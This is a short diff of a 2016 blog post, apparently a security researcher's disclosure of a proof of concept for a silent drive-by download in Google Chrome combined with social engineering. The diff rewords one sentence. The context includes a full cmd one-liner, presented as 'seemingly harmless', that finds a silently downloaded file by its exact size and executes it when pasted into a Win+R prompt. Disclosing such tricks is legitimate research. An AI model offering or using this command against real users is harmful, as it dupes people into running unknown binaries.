hexatomium/hexatomium-old.github.io/_posts/2016-03-24-chrome-wave-poc.md

-This demonstrates a fully silent drive-by download in Google Chrome, as well as a social engineering component: a PoC binary will execute if this seemingly harmless command is entered in a **Win+R** prompt on a Windows system (you may need to wait for a few seconds before the fun starts):
+This demonstrates a fully silent drive-by download in Google Chrome, as well as a social engineering component: a PoC binary will execute if this seemingly harmless command is entered in a **Win+R** prompt on a Windows system (note that you may need to wait for a few seconds before the fun starts):

 <pre>
 cmd /c for /r %g in (*_*) do if %~zg==23456 copy /y "%g" "%g.log" & "%g.log"